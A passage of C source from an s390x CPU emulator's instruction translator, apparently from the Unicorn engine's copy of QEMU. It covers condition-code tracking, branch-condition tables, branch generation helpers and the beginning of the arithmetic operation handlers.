} } else { tcg_gen_movi_i64(tcg_ctx, tmp, d2); } return tmp; } static inline bool live_cc_data(DisasContext *s) { return (s->cc_op != CC_OP_DYNAMIC && s->cc_op != CC_OP_STATIC && s->cc_op > 3); } static inline void gen_op_movi_cc(DisasContext *s, uint32_t val) { if (live_cc_data(s)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_src); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_dst); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } s->cc_op = CC_OP_CONST0 + val; } static void gen_op_update1_cc_i64(DisasContext *s, enum cc_op op, TCGv_i64 dst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (live_cc_data(s)) { tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_src); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_dst, dst); s->cc_op = op; } static void gen_op_update2_cc_i64(DisasContext *s, enum cc_op op, TCGv_i64 src, TCGv_i64 dst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (live_cc_data(s)) { tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_src, src); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_dst, dst); s->cc_op = op; } static void gen_op_update3_cc_i64(DisasContext *s, enum cc_op op, TCGv_i64 src, TCGv_i64 dst, TCGv_i64 vr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_src, src); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_dst, dst); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_vr, vr); s->cc_op = op; } static void set_cc_nz_u64(DisasContext *s, TCGv_i64 val) { gen_op_update1_cc_i64(s, CC_OP_NZ, val); } static void gen_set_cc_nz_f32(DisasContext *s, TCGv_i64 val) { gen_op_update1_cc_i64(s, CC_OP_NZ_F32, val); } static void gen_set_cc_nz_f64(DisasContext *s, TCGv_i64 val) { gen_op_update1_cc_i64(s, CC_OP_NZ_F64, val); } static void gen_set_cc_nz_f128(DisasContext *s, TCGv_i64 vh, TCGv_i64 vl) { gen_op_update2_cc_i64(s, CC_OP_NZ_F128, vh, vl); } /* CC value is in env->cc_op */ static void set_cc_static(DisasContext *s) { if (live_cc_data(s)) { 
TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_src); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_dst); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } s->cc_op = CC_OP_STATIC; } /* calculates cc into cc_op */ static void gen_op_calc_cc(DisasContext *s) { TCGv_i32 local_cc_op = NULL; TCGv_i64 dummy = NULL; TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { default: dummy = tcg_const_i64(tcg_ctx, 0); /* FALLTHRU */ case CC_OP_ADD_64: case CC_OP_ADDU_64: case CC_OP_ADDC_64: case CC_OP_SUB_64: case CC_OP_SUBU_64: case CC_OP_SUBB_64: case CC_OP_ADD_32: case CC_OP_ADDU_32: case CC_OP_ADDC_32: case CC_OP_SUB_32: case CC_OP_SUBU_32: case CC_OP_SUBB_32: local_cc_op = tcg_const_i32(tcg_ctx, s->cc_op); break; case CC_OP_CONST0: case CC_OP_CONST1: case CC_OP_CONST2: case CC_OP_CONST3: case CC_OP_STATIC: case CC_OP_DYNAMIC: break; } switch (s->cc_op) { case CC_OP_CONST0: case CC_OP_CONST1: case CC_OP_CONST2: case CC_OP_CONST3: /* s->cc_op is the cc value */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cc_op, s->cc_op - CC_OP_CONST0); break; case CC_OP_STATIC: /* env->cc_op already is the cc value */ break; case CC_OP_NZ: case CC_OP_ABS_64: case CC_OP_NABS_64: case CC_OP_ABS_32: case CC_OP_NABS_32: case CC_OP_LTGT0_32: case CC_OP_LTGT0_64: case CC_OP_COMP_32: case CC_OP_COMP_64: case CC_OP_NZ_F32: case CC_OP_NZ_F64: case CC_OP_FLOGR: case CC_OP_LCBB: /* 1 argument */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, local_cc_op, dummy, tcg_ctx->cc_dst, dummy); break; case CC_OP_ICM: case CC_OP_LTGT_32: case CC_OP_LTGT_64: case CC_OP_LTUGTU_32: case CC_OP_LTUGTU_64: case CC_OP_TM_32: case CC_OP_TM_64: case CC_OP_SLA: case CC_OP_NZ_F128: case CC_OP_VC: /* 2 arguments */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, local_cc_op, tcg_ctx->cc_src, tcg_ctx->cc_dst, dummy); break; case CC_OP_ADD_64: case CC_OP_ADDU_64: case CC_OP_ADDC_64: case CC_OP_SUB_64: case CC_OP_SUBU_64: case CC_OP_SUBB_64: case CC_OP_ADD_32: case CC_OP_ADDU_32: case CC_OP_ADDC_32: case CC_OP_SUB_32: case CC_OP_SUBU_32: case CC_OP_SUBB_32: /* 3 arguments */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, local_cc_op, tcg_ctx->cc_src, tcg_ctx->cc_dst, tcg_ctx->cc_vr); break; case CC_OP_DYNAMIC: /* unknown operation - assume 3 arguments and cc_op in env */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->cc_op, tcg_ctx->cc_src, tcg_ctx->cc_dst, tcg_ctx->cc_vr); break; default: tcg_abort(); } if (local_cc_op) { tcg_temp_free_i32(tcg_ctx, local_cc_op); } if (dummy) { tcg_temp_free_i64(tcg_ctx, dummy); } /* We now have cc in cc_op as constant */ set_cc_static(s); } static bool use_exit_tb(DisasContext *s) { return s->base.singlestep_enabled || (tb_cflags(s->base.tb) & CF_LAST_IO) || (s->base.tb->flags & FLAG_MASK_PER); } static bool use_goto_tb(DisasContext *s, uint64_t dest) { if (unlikely(use_exit_tb(s))) { return false; } return (dest & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK) || (dest & TARGET_PAGE_MASK) == (s->base.pc_next & TARGET_PAGE_MASK); } static void account_noninline_branch(DisasContext *s, int cc_op) { #ifdef DEBUG_INLINE_BRANCHES inline_branch_miss[cc_op]++; #endif } static void account_inline_branch(DisasContext *s, int cc_op) { #ifdef DEBUG_INLINE_BRANCHES inline_branch_hit[cc_op]++; #endif } /* Table of mask values to comparison codes, given a comparison as input. For such, CC=3 should not be possible. 
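   For example, mask 8 | 4 (branch if CC 0 or CC 1, i.e. equal or low)
   maps to TCG_COND_LE and mask 8 | 2 (equal or high) to TCG_COND_GE;
   entries come in pairs because bit 0 (CC 3) is a don't-care here.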
*/ static const TCGCond ltgt_cond[16] = { TCG_COND_NEVER, TCG_COND_NEVER, /* | | | x */ TCG_COND_GT, TCG_COND_GT, /* | | GT | x */ TCG_COND_LT, TCG_COND_LT, /* | LT | | x */ TCG_COND_NE, TCG_COND_NE, /* | LT | GT | x */ TCG_COND_EQ, TCG_COND_EQ, /* EQ | | | x */ TCG_COND_GE, TCG_COND_GE, /* EQ | | GT | x */ TCG_COND_LE, TCG_COND_LE, /* EQ | LT | | x */ TCG_COND_ALWAYS, TCG_COND_ALWAYS, /* EQ | LT | GT | x */ }; /* Table of mask values to comparison codes, given a logic op as input. For such, only CC=0 and CC=1 should be possible. */ static const TCGCond nz_cond[16] = { TCG_COND_NEVER, TCG_COND_NEVER, /* | | x | x */ TCG_COND_NEVER, TCG_COND_NEVER, TCG_COND_NE, TCG_COND_NE, /* | NE | x | x */ TCG_COND_NE, TCG_COND_NE, TCG_COND_EQ, TCG_COND_EQ, /* EQ | | x | x */ TCG_COND_EQ, TCG_COND_EQ, TCG_COND_ALWAYS, TCG_COND_ALWAYS, /* EQ | NE | x | x */ TCG_COND_ALWAYS, TCG_COND_ALWAYS, }; /* Interpret MASK in terms of S->CC_OP, and fill in C with all the details required to generate a TCG comparison. */ static void disas_jcc(DisasContext *s, DisasCompare *c, uint32_t mask) { TCGCond cond; enum cc_op old_cc_op = s->cc_op; TCGContext *tcg_ctx = s->uc->tcg_ctx; if (mask == 15 || mask == 0) { c->cond = (mask ? TCG_COND_ALWAYS : TCG_COND_NEVER); c->u.s32.a = tcg_ctx->cc_op; c->u.s32.b = tcg_ctx->cc_op; c->g1 = c->g2 = true; c->is_64 = false; return; } /* Find the TCG condition for the mask + cc op. */ switch (old_cc_op) { case CC_OP_LTGT0_32: case CC_OP_LTGT0_64: case CC_OP_LTGT_32: case CC_OP_LTGT_64: cond = ltgt_cond[mask]; if (cond == TCG_COND_NEVER) { goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_LTUGTU_32: case CC_OP_LTUGTU_64: cond = tcg_unsigned_cond(ltgt_cond[mask]); if (cond == TCG_COND_NEVER) { goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_NZ: cond = nz_cond[mask]; if (cond == TCG_COND_NEVER) { goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_TM_32: case CC_OP_TM_64: switch (mask) { case 8: cond = TCG_COND_EQ; break; case 4 | 2 | 1: cond = TCG_COND_NE; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_ICM: switch (mask) { case 8: cond = TCG_COND_EQ; break; case 4 | 2 | 1: case 4 | 2: cond = TCG_COND_NE; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_FLOGR: switch (mask & 0xa) { case 8: /* src == 0 -> no one bit found */ cond = TCG_COND_EQ; break; case 2: /* src != 0 -> one bit found */ cond = TCG_COND_NE; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_ADDU_32: case CC_OP_ADDU_64: switch (mask) { case 8 | 2: /* vr == 0 */ cond = TCG_COND_EQ; break; case 4 | 1: /* vr != 0 */ cond = TCG_COND_NE; break; case 8 | 4: /* no carry -> vr >= src */ cond = TCG_COND_GEU; break; case 2 | 1: /* carry -> vr < src */ cond = TCG_COND_LTU; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; case CC_OP_SUBU_32: case CC_OP_SUBU_64: /* Note that CC=0 is impossible; treat it as dont-care. */ switch (mask & 7) { case 2: /* zero -> op1 == op2 */ cond = TCG_COND_EQ; break; case 4 | 1: /* !zero -> op1 != op2 */ cond = TCG_COND_NE; break; case 4: /* borrow (!carry) -> op1 < op2 */ cond = TCG_COND_LTU; break; case 2 | 1: /* !borrow (carry) -> op1 >= op2 */ cond = TCG_COND_GEU; break; default: goto do_dynamic; } account_inline_branch(s, old_cc_op); break; default: do_dynamic: /* Calculate cc value. */ gen_op_calc_cc(s); /* FALLTHRU */ case CC_OP_STATIC: /* Jump based on CC. 
We'll load up the real cond below; the assignment here merely avoids a compiler warning. */ account_noninline_branch(s, old_cc_op); old_cc_op = CC_OP_STATIC; cond = TCG_COND_NEVER; break; } /* Load up the arguments of the comparison. */ c->is_64 = true; c->g1 = c->g2 = false; switch (old_cc_op) { case CC_OP_LTGT0_32: c->is_64 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_dst); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); break; case CC_OP_LTGT_32: case CC_OP_LTUGTU_32: case CC_OP_SUBU_32: c->is_64 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_src); c->u.s32.b = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.b, tcg_ctx->cc_dst); break; case CC_OP_LTGT0_64: case CC_OP_NZ: case CC_OP_FLOGR: c->u.s64.a = tcg_ctx->cc_dst; c->u.s64.b = tcg_const_i64(tcg_ctx, 0); c->g1 = true; break; case CC_OP_LTGT_64: case CC_OP_LTUGTU_64: case CC_OP_SUBU_64: c->u.s64.a = tcg_ctx->cc_src; c->u.s64.b = tcg_ctx->cc_dst; c->g1 = c->g2 = true; break; case CC_OP_TM_32: case CC_OP_TM_64: case CC_OP_ICM: c->u.s64.a = tcg_temp_new_i64(tcg_ctx); c->u.s64.b = tcg_const_i64(tcg_ctx, 0); tcg_gen_and_i64(tcg_ctx, c->u.s64.a, tcg_ctx->cc_src, tcg_ctx->cc_dst); break; case CC_OP_ADDU_32: c->is_64 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); c->u.s32.b = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_vr); if (cond == TCG_COND_EQ || cond == TCG_COND_NE) { tcg_gen_movi_i32(tcg_ctx, c->u.s32.b, 0); } else { tcg_gen_extrl_i64_i32(tcg_ctx, c->u.s32.b, tcg_ctx->cc_src); } break; case CC_OP_ADDU_64: c->u.s64.a = tcg_ctx->cc_vr; c->g1 = true; if (cond == TCG_COND_EQ || cond == TCG_COND_NE) { c->u.s64.b = tcg_const_i64(tcg_ctx, 0); } else { c->u.s64.b = tcg_ctx->cc_src; c->g2 = true; } break; case CC_OP_STATIC: c->is_64 = false; c->u.s32.a = tcg_ctx->cc_op; c->g1 = true; switch (mask) { case 0x8 | 0x4 | 0x2: /* cc != 3 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 3); break; case 0x8 | 0x4 | 0x1: /* cc != 2 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 2); break; case 0x8 | 0x2 | 0x1: /* cc != 1 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 1); break; case 0x8 | 0x2: /* cc == 0 || cc == 2 => (cc & 1) == 0 */ cond = TCG_COND_EQ; c->g1 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_andi_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_op, 1); break; case 0x8 | 0x4: /* cc < 2 */ cond = TCG_COND_LTU; c->u.s32.b = tcg_const_i32(tcg_ctx, 2); break; case 0x8: /* cc == 0 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 0); break; case 0x4 | 0x2 | 0x1: /* cc != 0 */ cond = TCG_COND_NE; c->u.s32.b = tcg_const_i32(tcg_ctx, 0); break; case 0x4 | 0x1: /* cc == 1 || cc == 3 => (cc & 1) != 0 */ cond = TCG_COND_NE; c->g1 = false; c->u.s32.a = tcg_temp_new_i32(tcg_ctx); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_andi_i32(tcg_ctx, c->u.s32.a, tcg_ctx->cc_op, 1); break; case 0x4: /* cc == 1 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 1); break; case 0x2 | 0x1: /* cc > 1 */ cond = TCG_COND_GTU; c->u.s32.b = tcg_const_i32(tcg_ctx, 1); break; case 0x2: /* cc == 2 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 2); break; case 0x1: /* cc == 3 */ cond = TCG_COND_EQ; c->u.s32.b = tcg_const_i32(tcg_ctx, 3); break; default: /* CC is masked by something else: (8 >> cc) & mask. 
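   E.g. for mask 9 (CC 0 or CC 3): 8 >> cc yields 8, 4, 2, 1 for
   cc = 0..3, so the AND below is nonzero exactly for cc 0 and cc 3.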
*/ cond = TCG_COND_NE; c->g1 = false; c->u.s32.a = tcg_const_i32(tcg_ctx, 8); c->u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_shr_i32(tcg_ctx, c->u.s32.a, c->u.s32.a, tcg_ctx->cc_op); tcg_gen_andi_i32(tcg_ctx, c->u.s32.a, c->u.s32.a, mask); break; } break; default: abort(); } c->cond = cond; } static void free_compare(TCGContext *tcg_ctx, DisasCompare *c) { if (!c->g1) { if (c->is_64) { tcg_temp_free_i64(tcg_ctx, c->u.s64.a); } else { tcg_temp_free_i32(tcg_ctx, c->u.s32.a); } } if (!c->g2) { if (c->is_64) { tcg_temp_free_i64(tcg_ctx, c->u.s64.b); } else { tcg_temp_free_i32(tcg_ctx, c->u.s32.b); } } } /* ====================================================================== */ /* Define the insn format enumeration. */ #define F0(N) FMT_##N, #define F1(N, X1) F0(N) #define F2(N, X1, X2) F0(N) #define F3(N, X1, X2, X3) F0(N) #define F4(N, X1, X2, X3, X4) F0(N) #define F5(N, X1, X2, X3, X4, X5) F0(N) #define F6(N, X1, X2, X3, X4, X5, X6) F0(N) typedef enum { #include "insn-format.def" } DisasFormat; #undef F0 #undef F1 #undef F2 #undef F3 #undef F4 #undef F5 #undef F6 /* This is the way fields are to be accessed out of DisasFields. */ #define have_field(S, F) have_field1((S), FLD_O_##F) #define get_field(S, F) get_field1((S), FLD_O_##F, FLD_C_##F) static bool have_field1(const DisasContext *s, enum DisasFieldIndexO c) { return (s->fields.presentO >> c) & 1; } static int get_field1(const DisasContext *s, enum DisasFieldIndexO o, enum DisasFieldIndexC c) { assert(have_field1(s, o)); return s->fields.c[c]; } /* Describe the layout of each field in each format. */ typedef struct DisasField { unsigned int beg:8; unsigned int size:8; unsigned int type:2; unsigned int indexC:6; enum DisasFieldIndexO indexO:8; } DisasField; typedef struct DisasFormatInfo { DisasField op[NUM_C_FIELD]; } DisasFormatInfo; #define R(N, B) { B, 4, 0, FLD_C_r##N, FLD_O_r##N } #define M(N, B) { B, 4, 0, FLD_C_m##N, FLD_O_m##N } #define V(N, B) { B, 4, 3, FLD_C_v##N, FLD_O_v##N } #define BD(N, BB, BD) { BB, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { BD, 12, 0, FLD_C_d##N, FLD_O_d##N } #define BXD(N) { 16, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { 12, 4, 0, FLD_C_x##N, FLD_O_x##N }, \ { 20, 12, 0, FLD_C_d##N, FLD_O_d##N } #define BDL(N) { 16, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { 20, 20, 2, FLD_C_d##N, FLD_O_d##N } #define BXDL(N) { 16, 4, 0, FLD_C_b##N, FLD_O_b##N }, \ { 12, 4, 0, FLD_C_x##N, FLD_O_x##N }, \ { 20, 20, 2, FLD_C_d##N, FLD_O_d##N } #define I(N, B, S) { B, S, 1, FLD_C_i##N, FLD_O_i##N } #define L(N, B, S) { B, S, 0, FLD_C_l##N, FLD_O_l##N } #define F0(N) { { { 0 } } }, #define F1(N, X1) { { X1 } }, #define F2(N, X1, X2) { { X1, X2 } }, #define F3(N, X1, X2, X3) { { X1, X2, X3 } }, #define F4(N, X1, X2, X3, X4) { { X1, X2, X3, X4 } }, #define F5(N, X1, X2, X3, X4, X5) { { X1, X2, X3, X4, X5 } }, #define F6(N, X1, X2, X3, X4, X5, X6) { { X1, X2, X3, X4, X5, X6 } }, static const DisasFormatInfo format_info[] = { #include "insn-format.def" }; #undef F0 #undef F1 #undef F2 #undef F3 #undef F4 #undef F5 #undef F6 #undef R #undef M #undef V #undef BD #undef BXD #undef BDL #undef BXDL #undef I #undef L /* Generally, we'll extract operands into this structures, operate upon them, and store them back. See the "in1", "in2", "prep", "wout" sets of routines below for more details. */ typedef struct { bool g_out, g_out2, g_in1, g_in2; TCGv_i64 out, out2, in1, in2; TCGv_i64 addr1; } DisasOps; /* Instructions can place constraints on their operands, raising specification exceptions if they are violated. 
To make this easy to automate, each "in1", "in2", "prep", "wout" helper will have a SPEC_<name> define that equals one of the following, or 0. To make this easy to document, we'll put the SPEC_<name> defines next to <name>. */ #define SPEC_r1_even 1 #define SPEC_r2_even 2 #define SPEC_r3_even 4 #define SPEC_r1_f128 8 #define SPEC_r2_f128 16 /* Return values from translate_one, indicating the state of the TB. */ /* We are not using a goto_tb (for whatever reason), but have updated the PC (for whatever reason), so there's no need to do it again on exiting the TB. */ #define DISAS_PC_UPDATED DISAS_TARGET_0 /* We have emitted one or more goto_tb. No fixup required. */ #define DISAS_GOTO_TB DISAS_TARGET_1 /* We have updated the PC and CC values. */ #define DISAS_PC_CC_UPDATED DISAS_TARGET_2 /* We are exiting the TB, but have neither emitted a goto_tb, nor updated the PC for the next instruction to be executed. */ #define DISAS_PC_STALE DISAS_TARGET_3 /* We are exiting the TB to the main loop. */ #define DISAS_PC_STALE_NOCHAIN DISAS_TARGET_4 #define DISAS_UNICORN_HALT DISAS_TARGET_11 /* Instruction flags */ #define IF_AFP1 0x0001 /* r1 is a fp reg for HFP/FPS instructions */ #define IF_AFP2 0x0002 /* r2 is a fp reg for HFP/FPS instructions */ #define IF_AFP3 0x0004 /* r3 is a fp reg for HFP/FPS instructions */ #define IF_BFP 0x0008 /* binary floating point instruction */ #define IF_DFP 0x0010 /* decimal floating point instruction */ #define IF_PRIV 0x0020 /* privileged instruction */ #define IF_VEC 0x0040 /* vector instruction */ struct DisasInsn { unsigned opc:16; unsigned flags:16; DisasFormat fmt:8; unsigned fac:8; unsigned spec:8; const char *name; /* Pre-process arguments before HELP_OP. */ void (*help_in1)(DisasContext *, DisasOps *); void (*help_in2)(DisasContext *, DisasOps *); void (*help_prep)(DisasContext *, DisasOps *); /* * Post-process output after HELP_OP. * Note that these are not called if HELP_OP returns DISAS_NORETURN. */ void (*help_wout)(DisasContext *, DisasOps *); void (*help_cout)(DisasContext *, DisasOps *); /* Implement the operation itself. */ DisasJumpType (*help_op)(DisasContext *, DisasOps *); uint64_t data; }; /* ====================================================================== */ /* Miscellaneous helpers, used by several operations. */ static DisasJumpType help_goto_direct(DisasContext *s, uint64_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (dest == s->pc_tmp) { per_branch(s, true); return DISAS_NEXT; } if (use_goto_tb(s, dest)) { update_cc_op(s); per_breaking_event(s); tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 0); return DISAS_GOTO_TB; } else { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); per_branch(s, false); return DISAS_PC_UPDATED; } } static DisasJumpType help_branch(DisasContext *s, DisasCompare *c, bool is_imm, int imm, TCGv_i64 cdest) { DisasJumpType ret; uint64_t dest = s->base.pc_next + (int64_t)imm * 2; TCGLabel *lab; TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Take care of the special cases first. */ if (c->cond == TCG_COND_NEVER) { ret = DISAS_NEXT; goto egress; } if (is_imm) { if (dest == s->pc_tmp) { /* Branch to next. */ per_branch(s, true); ret = DISAS_NEXT; goto egress; } if (c->cond == TCG_COND_ALWAYS) { ret = help_goto_direct(s, dest); goto egress; } } else { if (!cdest) { /* E.g. bcr %r0 -> no branch. 
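   Using register 0 as the branch target architecturally means "do not
   branch", so we simply fall through.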
*/ ret = DISAS_NEXT; goto egress; } if (c->cond == TCG_COND_ALWAYS) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, cdest); per_branch(s, false); ret = DISAS_PC_UPDATED; goto egress; } } if (use_goto_tb(s, s->pc_tmp)) { if (is_imm && use_goto_tb(s, dest)) { /* Both exits can use goto_tb. */ update_cc_op(s); lab = gen_new_label(tcg_ctx); if (c->is_64) { tcg_gen_brcond_i64(tcg_ctx, c->cond, c->u.s64.a, c->u.s64.b, lab); } else { tcg_gen_brcond_i32(tcg_ctx, c->cond, c->u.s32.a, c->u.s32.b, lab); } /* Branch not taken. */ tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->pc_tmp); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 0); /* Branch taken. */ gen_set_label(tcg_ctx, lab); per_breaking_event(s); tcg_gen_goto_tb(tcg_ctx, 1); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 1); ret = DISAS_GOTO_TB; } else { /* Fallthru can use goto_tb, but taken branch cannot. */ /* Store taken branch destination before the brcond. This avoids having to allocate a new local temp to hold it. We'll overwrite this in the not taken case anyway. */ if (!is_imm) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, cdest); } lab = gen_new_label(tcg_ctx); if (c->is_64) { tcg_gen_brcond_i64(tcg_ctx, c->cond, c->u.s64.a, c->u.s64.b, lab); } else { tcg_gen_brcond_i32(tcg_ctx, c->cond, c->u.s32.a, c->u.s32.b, lab); } /* Branch not taken. */ update_cc_op(s); tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->pc_tmp); tcg_gen_exit_tb(tcg_ctx, s->base.tb, 0); gen_set_label(tcg_ctx, lab); if (is_imm) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, dest); } per_breaking_event(s); ret = DISAS_PC_UPDATED; } } else { /* Fallthru cannot use goto_tb. This by itself is vanishingly rare. Most commonly we're single-stepping or some other condition that disables all use of goto_tb. Just update the PC and exit. */ TCGv_i64 next = tcg_const_i64(tcg_ctx, s->pc_tmp); if (is_imm) { cdest = tcg_const_i64(tcg_ctx, dest); } if (c->is_64) { tcg_gen_movcond_i64(tcg_ctx, c->cond, tcg_ctx->psw_addr, c->u.s64.a, c->u.s64.b, cdest, next); per_branch_cond(s, c->cond, c->u.s64.a, c->u.s64.b); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 z = tcg_const_i64(tcg_ctx, 0); tcg_gen_setcond_i32(tcg_ctx, c->cond, t0, c->u.s32.a, c->u.s32.b); tcg_gen_extu_i32_i64(tcg_ctx, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, tcg_ctx->psw_addr, t1, z, cdest, next); per_branch_cond(s, TCG_COND_NE, t1, z); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, z); } if (is_imm) { tcg_temp_free_i64(tcg_ctx, cdest); } tcg_temp_free_i64(tcg_ctx, next); ret = DISAS_PC_UPDATED; } egress: free_compare(tcg_ctx, c); return ret; } /* ====================================================================== */ /* The operations. These perform the bulk of the work for any insn, usually after the operands have been loaded and output initialized. 
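   translate_one() (later in this file) runs help_in1, help_in2 and
   help_prep first, then help_op, then help_wout and help_cout to write
   results back and set the condition code.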
*/ static DisasJumpType op_abs(DisasContext *s, DisasOps *o) { tcg_gen_abs_i64(s->uc->tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_absf32(DisasContext *s, DisasOps *o) { tcg_gen_andi_i64(s->uc->tcg_ctx, o->out, o->in2, 0x7fffffffull); return DISAS_NEXT; } static DisasJumpType op_absf64(DisasContext *s, DisasOps *o) { tcg_gen_andi_i64(s->uc->tcg_ctx, o->out, o->in2, 0x7fffffffffffffffull); return DISAS_NEXT; } static DisasJumpType op_absf128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_andi_i64(tcg_ctx, o->out, o->in1, 0x7fffffffffffffffull); tcg_gen_mov_i64(tcg_ctx, o->out2, o->in2); return DISAS_NEXT; } static DisasJumpType op_add(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_addc(DisasContext *s, DisasOps *o) { DisasCompare cmp; TCGv_i64 carry; TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); /* The carry flag is the msb of CC, therefore the branch mask that would create that comparison is 3. Feeding the generated comparison to setcond produces the carry flag that we desire. */ disas_jcc(s, &cmp, 3); carry = tcg_temp_new_i64(tcg_ctx); if (cmp.is_64) { tcg_gen_setcond_i64(tcg_ctx, cmp.cond, carry, cmp.u.s64.a, cmp.u.s64.b); } else { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, cmp.cond, t, cmp.u.s32.a, cmp.u.s32.b); tcg_gen_extu_i32_i64(tcg_ctx, carry, t); tcg_temp_free_i32(tcg_ctx, t); } free_compare(tcg_ctx, &cmp); tcg_gen_add_i64(tcg_ctx, o->out, o->out, carry); tcg_temp_free_i64(tcg_ctx, carry); return DISAS_NEXT; } static DisasJumpType op_asi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_STFLE_45)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic addition in memory. */ tcg_gen_atomic_fetch_add_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. 
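   The atomic variant returned the *old* memory value in in1, so the
   addition below reconstructs the value that was stored.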
